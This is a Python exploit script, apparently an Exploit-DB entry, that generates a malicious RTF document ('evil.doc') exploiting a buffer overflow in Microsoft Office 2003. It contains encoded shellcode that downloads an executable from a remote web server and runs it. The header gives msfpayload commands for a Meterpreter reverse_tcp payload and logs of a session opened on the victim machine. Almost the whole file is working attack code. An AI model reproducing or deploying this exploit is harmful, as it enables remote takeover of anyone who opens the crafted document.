  1. #!/usr/bin/python
  2.  
  3. #
  4. # Note from the Exploit-DB team: This might be the same bug as:
  5. # https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
  6. #
  7.  
  8. #-----------------------------------------------------------------------------------#
  9. # Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3               #
  10. # Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges)                             #
  11. #####################################################################################
  12. # One shellcode to rule them all, One shellcode to find them, One shellcode to      #
  13. # bring them all and in the darkness bind them!!                                    #
  14. #                                                                                   #
  15. # Greetings: offsec, corelan, setoolkit                                             #
  16. #####################################################################################
  17. # (1) root@bt:~/Desktop/office# ./office2003.py                                     #
  18. #     root@bt:~/Desktop/office# mv evil.doc /var/www/                               #
  19. #                                                                                   #
  20. # (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
  21. #     > /var/www/magic.exe                                                          #
  22. #                                                                                   #
  23. # (3) msf  exploit(handler) > exploit                                               #
  24. #                                                                                   #
  25. #    [*] Started reverse handler on 192.168.111.132:9988                            #
  26. #    [*] Starting the payload handler...                                            #
  27. #    [*] Sending stage (752128 bytes) to 192.168.111.128                            #
  28. #    [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
  29. #        at 2012-01-08 18:46:26 +0800                                               #
  30. #                                                                                   #
  31. #    meterpreter > ipconfig                                                         #
  32. #                                                                                   #
  33. #    MS TCP Loopback interface                                                      #
  34. #    Hardware MAC: 00:00:00:00:00:00                                                #
  35. #    IP Address  : 127.0.0.1                                                        #
  36. #    Netmask     : 255.0.0.0                                                        #
  37. #                                                                                   #
  38. #   AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport               #
  39. #   Hardware MAC: 00:0c:29:6c:92:42                                                 #
  40. #   IP Address  : 192.168.111.128                                                   #
  41. #   Netmask     : 255.255.255.0                                                     #
  42. #-----------------------------------------------------------------------------------#
  43.  
  44. import binascii
  45.  
  46. filename = "evil.doc"
  47.  
  48. #-----------------------------------------------------------------------------------#
  49. # File Structure                                                                    #
  50. #-----------------------------------------------------------------------------------#
  51. file = (
  52. "{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
  53. "hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
  54. "\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")
  55.  
  56. #-----------------------------------------------------------------------------------#
  57. # Open raw socket to download payload to parent directory as "a.exe"                #
  58. # ==> cmd execute "a.exe"                                                           #
  59. #-----------------------------------------------------------------------------------#
  60. magic = (
  61. "\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
  62. "\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
  63. "\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
  64. "\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
  65. "\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
  66. "\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
  67. "\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
  68. "\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
  69. "\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
  70. "\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
  71. "\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
  72. "\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
  73. "\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
  74. "\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
  75. "\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
  76. "\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
  77. "\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
  78. "\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
  79. "\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
  80. "\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
  81. "\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
  82. "\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
  83. "\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
  84. "\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
  85. "\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
  86. "\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
  87. "\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
  88. "\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
  89. "\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")
  90.  
  91. #------------------------------------------------------------------------------------------------------------------------------#
  92. # Two versions of office 2003 floating around:                                                                                 #
  93. # (1) Standalone version, (2) XP Service Pack upgrade                                                                          #
  94. ################################################################################################################################
  95. # Unfortunately, although the exploit works for both versions, they require different pointers to ESP...                     #
  96. #                                                                                                                              #
  97. # (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30"                                                #
  98. # => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe                           #
  99. #                                                                                                                              #
  100. # (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30"                                        #
  101. # => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
  102. #------------------------------------------------------------------------------------------------------------------------------#
  103.  
  104. EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer
  105.  
  106. filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18
  107.  
  108. buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic
  109.  
  110. #-----------------------------------------------------------------------------------#
  111. # Since we are downloading our payload from a remote webserver there are no         #
  112. # restrictions on payload size or badcharacters...                                  #
  113. #-----------------------------------------------------------------------------------#
  114.  
  115. URL = "http://192.168.111.132/magic.exe"
  116. binnu = binascii.b2a_hex(URL)
  117.  
  118. URL2 = "00"
  119. nxt="{}}}}}}"
  120. nxt+="\x0d\x0a"
  121. nxt+="}"
  122.  
  123. textfile = open(filename , 'w')
  124. textfile.write(file+buffer+binnu+URL2+nxt)
  125. textfile.close()